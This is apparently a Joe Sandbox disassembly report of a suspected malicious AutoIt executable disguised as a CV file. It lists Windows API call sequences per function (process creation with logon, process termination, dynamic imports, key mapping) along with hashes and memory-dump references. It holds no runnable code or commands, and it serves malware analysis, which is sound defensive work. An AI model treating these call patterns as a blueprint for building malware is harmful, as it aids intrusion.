                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                            • String ID:
                                                                                            • API String ID: 4137160315-0
                                                                                            • Opcode ID: 4ff082f457243224443c3e70d597298ad767fd1ef5391b6673162712004fd60a
                                                                                            • Instruction ID: 8e9949dc7485ddcf21e640fee6c5b69f228678d72949939ccb233157e8c64b5a
                                                                                            • Opcode Fuzzy Hash: 4ff082f457243224443c3e70d597298ad767fd1ef5391b6673162712004fd60a
                                                                                            • Instruction Fuzzy Hash: E231CF72608305ABCB14DF14E849F9AB7E9FF89314F00092AF595D7191DB71EA84CB92
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000FAFAE
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 000FAFB5
                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000FAFC4
                                                                                            • CloseHandle.KERNEL32(00000004), ref: 000FAFCF
                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000FAFFE
                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 000FB012
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                            • String ID:
                                                                                            • API String ID: 1413079979-0
                                                                                            • Opcode ID: 725acdaffae68319f7d70da0e82ac8a817814871f0e631ccfb4c4a3de0a0f97e
                                                                                            • Instruction ID: eca7dbdbbc4cafdbf1044538805aa615b37da5efc1a7e9b618b0fe4607c47cf5
                                                                                            • Opcode Fuzzy Hash: 725acdaffae68319f7d70da0e82ac8a817814871f0e631ccfb4c4a3de0a0f97e
                                                                                            • Instruction Fuzzy Hash: D2216FB220020DAFDF128F94ED49FEE7BA9EF4A304F044025FA05A6561C376DD65EB61
                                                                                            APIs
                                                                                              • Part of subcall function 000DAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000DAFE3
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DAFF2
                                                                                              • Part of subcall function 000DAF83: BeginPath.GDI32(?), ref: 000DB009
                                                                                              • Part of subcall function 000DAF83: SelectObject.GDI32(?,00000000), ref: 000DB033
                                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0012EC20
                                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0012EC34
                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0012EC42
                                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0012EC52
                                                                                            • EndPath.GDI32(00000000), ref: 0012EC62
                                                                                            • StrokePath.GDI32(00000000), ref: 0012EC72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                            • String ID:
                                                                                            • API String ID: 43455801-0
                                                                                            • Opcode ID: 4ed7ea7b86ee7fc7b313ac1ff91b02e9bf11e8b0155364097f0fd72dabfc1e8e
                                                                                            • Instruction ID: 94ca28cf7a5d2948234d4f65dafef2e0055b059218917bcd5a269eb53674a8e9
                                                                                            • Opcode Fuzzy Hash: 4ed7ea7b86ee7fc7b313ac1ff91b02e9bf11e8b0155364097f0fd72dabfc1e8e
                                                                                            • Instruction Fuzzy Hash: 30110C76000159BFDF119F90EC88EEA7F6DEF05350F148162BE0846570D7719D95DBA0
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 000FE1C0
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 000FE1D1
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000FE1D8
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 000FE1E0
                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000FE1F7
                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 000FE209
                                                                                              • Part of subcall function 000F9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000F9A05,00000000,00000000,?,000F9DDB), ref: 000FA53A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                            • String ID:
                                                                                            • API String ID: 603618608-0
                                                                                            • Opcode ID: ec970b8f79df83331395d18b621db57fba046c844b54be626160a1db3dcbbbe7
                                                                                            • Instruction ID: 3c60803d1e2022b76618bd5d7e7257a543560df24c1a19623d66e11c84af7fa5
                                                                                            • Opcode Fuzzy Hash: ec970b8f79df83331395d18b621db57fba046c844b54be626160a1db3dcbbbe7
                                                                                            • Instruction Fuzzy Hash: 5A018FB9A00658BFEF109BA6DC45B5EBFB8EB49751F004066EE04A76A0D6709C01CBA0
                                                                                            APIs
                                                                                            • __init_pointers.LIBCMT ref: 000E7B47
                                                                                              • Part of subcall function 000E123A: __initp_misc_winsig.LIBCMT ref: 000E125E
                                                                                              • Part of subcall function 000E123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000E7F51
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000E7F65
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000E7F78
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000E7F8B
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000E7F9E
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000E7FB1
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000E7FC4
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000E7FD7
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000E7FEA
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000E7FFD
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000E8010
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000E8023
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000E8036
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000E8049
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000E805C
                                                                                              • Part of subcall function 000E123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000E806F
                                                                                            • __mtinitlocks.LIBCMT ref: 000E7B4C
                                                                                              • Part of subcall function 000E7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0017AC68,00000FA0,?,?,000E7B51,000E5E77,00176C70,00000014), ref: 000E7E41
                                                                                            • __mtterm.LIBCMT ref: 000E7B55
                                                                                              • Part of subcall function 000E7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000E7B5A,000E5E77,00176C70,00000014), ref: 000E7D3F
                                                                                              • Part of subcall function 000E7BBD: _free.LIBCMT ref: 000E7D46
                                                                                              • Part of subcall function 000E7BBD: DeleteCriticalSection.KERNEL32(0017AC68,?,?,000E7B5A,000E5E77,00176C70,00000014), ref: 000E7D68
                                                                                            • __calloc_crt.LIBCMT ref: 000E7B7A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 000E7BA3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                            • String ID:
                                                                                            • API String ID: 2942034483-0
                                                                                            • Opcode ID: e137dce132adb16505f90ae7be857adb38958b95e7b7316b0bcdc494e4be6af8
                                                                                            • Instruction ID: 76676d446d9fb9f6e182a5bb412550b7219c5e7f86cb9c10b83ecbeba4ef0c4c
                                                                                            • Opcode Fuzzy Hash: e137dce132adb16505f90ae7be857adb38958b95e7b7316b0bcdc494e4be6af8
                                                                                            • Instruction Fuzzy Hash: 55F0903211D3D21DEA6977767C06BCB26D59F02730B2006A9F96CF91E3FF2188824161
                                                                                            APIs
                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 000C281D
                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 000C2825
                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000C2830
                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000C283B
                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 000C2843
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 000C284B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 4278518827-0
                                                                                            • Opcode ID: f3fbda19af0848059e085ae188c8831b791500188a3822b223fd7776a0bc63fd
                                                                                            • Instruction ID: 6e165ceccbf587aba01b40c251a2d389e7b7e68799dfcb68f1ce53208e37b260
                                                                                            • Opcode Fuzzy Hash: f3fbda19af0848059e085ae188c8831b791500188a3822b223fd7776a0bc63fd
                                                                                            • Instruction Fuzzy Hash: EA0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 1423608774-0
                                                                                            • Opcode ID: 7c56273d69e88853dae6c131a1110a91ca46e16ac66468063237121d21bead78
                                                                                            • Instruction ID: 97d9eadb7dca319ff233569eac1d8b41a64d5696cbf32abd518c6e85d2bcdd03
                                                                                            • Opcode Fuzzy Hash: 7c56273d69e88853dae6c131a1110a91ca46e16ac66468063237121d21bead78
                                                                                            • Instruction Fuzzy Hash: 1801813A302221EBDB152B68FC68DEB77A9FF89701B440569F543928F1DBE49840DB50
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00107C07
                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00107C1D
                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00107C2C
                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C3B
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C45
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00107C4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                            • String ID:
                                                                                            • API String ID: 839392675-0
                                                                                            • Opcode ID: f8cd8d0c96b30413141feab39b9143252e905e99fde7c1ab0ef09dc490ce5c07
                                                                                            • Instruction ID: b552d1b82942b1ce9888cc15e5cde81ba6efa4d07560f634f832e156b4aeda03
                                                                                            • Opcode Fuzzy Hash: f8cd8d0c96b30413141feab39b9143252e905e99fde7c1ab0ef09dc490ce5c07
                                                                                            • Instruction Fuzzy Hash: 8AF0307A141158BBEB215B52AC0DEEF7B7CEFC7B11F010018FA05914A1D7A05A81C6B5
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00109A33
                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A44
                                                                                            • TerminateThread.KERNEL32(?,000001F6,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A51
                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A5E
                                                                                              • Part of subcall function 001093D1: CloseHandle.KERNEL32(?,?,00109A6B,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 001093DB
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00109A71
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00135DEE,?,?,?,?,?,000CED63), ref: 00109A78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                            • String ID:
                                                                                            • API String ID: 3495660284-0
                                                                                            • Opcode ID: 91d6e3e02b3a8b0af8aeec2b46e321b7910c24556d46580136585af916c8cfb7
                                                                                            • Instruction ID: 92ce048dc4a5b03adae5a6b9dcb8fcdf72f49bd6cd4664393570f9ebb8057e54
                                                                                            • Opcode Fuzzy Hash: 91d6e3e02b3a8b0af8aeec2b46e321b7910c24556d46580136585af916c8cfb7
                                                                                            • Instruction Fuzzy Hash: 7BF05E3A241211ABDB112BA4FC99DAE7779FF86301B540425F503958B1DBF59841DB50
                                                                                            APIs
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • __swprintf.LIBCMT ref: 000C1EA6
                                                                                            Strings
                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 000C1D49
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                            • API String ID: 2125237772-557222456
                                                                                            • Opcode ID: c5c8b8367c89d08cd20d061b18c30d2b24c13041cf03bc655292eaece00ac4c5
                                                                                            • Instruction ID: 09b163b60aacf8d6cb2d5fbd62a90bd040c7df00b5eedfea96ba0026e062ba2c
                                                                                            • Opcode Fuzzy Hash: c5c8b8367c89d08cd20d061b18c30d2b24c13041cf03bc655292eaece00ac4c5
                                                                                            • Instruction Fuzzy Hash: 99915D71508241AFD724EF24C895EAEB7F4BF95700F14492DF885A72A2DB31ED04CB92
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 0011B006
                                                                                            • CharUpperBuffW.USER32(?,?), ref: 0011B115
                                                                                            • VariantClear.OLEAUT32(?), ref: 0011B298
                                                                                              • Part of subcall function 00109DC5: VariantInit.OLEAUT32(00000000), ref: 00109E05
                                                                                              • Part of subcall function 00109DC5: VariantCopy.OLEAUT32(?,?), ref: 00109E0E
                                                                                              • Part of subcall function 00109DC5: VariantClear.OLEAUT32(?), ref: 00109E1A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                            • API String ID: 4237274167-1221869570
                                                                                            • Opcode ID: 4343e02a3bacb640934f33addfce8d39163013390ad2c073abd3479153082b8f
                                                                                            • Instruction ID: f696066f0e80bfc928df65b70791fbe61cc0e3acb40a59c38ace308160ae5aed
                                                                                            • Opcode Fuzzy Hash: 4343e02a3bacb640934f33addfce8d39163013390ad2c073abd3479153082b8f
                                                                                            • Instruction Fuzzy Hash: A9917A746083019FCB14DF64C485EAEB7F4AF89700F04486DF89A9B362DB31E949CB52
                                                                                            APIs
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • _memset.LIBCMT ref: 00105438
                                                                                            • GetMenuItemInfoW.USER32(?), ref: 00105467
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00105513
                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0010553D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                            • String ID: 0
                                                                                            • API String ID: 4152858687-4108050209
                                                                                            • Opcode ID: c02d13e4bcdf666dfdaf83e4f05c0551149b2e505f1e4ed5cfe3d3ca24fccb35
                                                                                            • Instruction ID: 3f9ef2b7916d4b7b24b7e094e98f347b8e2be7fe7ad8c2e29922fad49fbb780e
                                                                                            • Opcode Fuzzy Hash: c02d13e4bcdf666dfdaf83e4f05c0551149b2e505f1e4ed5cfe3d3ca24fccb35
                                                                                            • Instruction Fuzzy Hash: 5951C1726087019BD7149B28CC45AABBBEAEF85354F140A2EF8D5D71D1EBE0CD448F52
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0010027B
                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001002B1
                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001002C2
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00100344
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                            • String ID: DllGetClassObject
                                                                                            • API String ID: 753597075-1075368562
                                                                                            • Opcode ID: afc185083e12d37aed24b43afcb39224dacb6031c378bd4334b5db6b5d27bd08
                                                                                            • Instruction ID: f12a225492eae0d9d1d373f497f65e157efe6deed016fb443dbeafcc8812b203
                                                                                            • Opcode Fuzzy Hash: afc185083e12d37aed24b43afcb39224dacb6031c378bd4334b5db6b5d27bd08
                                                                                            • Instruction Fuzzy Hash: 304139B1600204AFDB06CF54C884B9A7BB9FF49315F1580A9E949DF296D7F1DA44CBA0
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00105075
                                                                                            • GetMenuItemInfoW.USER32 ref: 00105091
                                                                                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001050D7
                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00181708,00000000), ref: 00105120
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
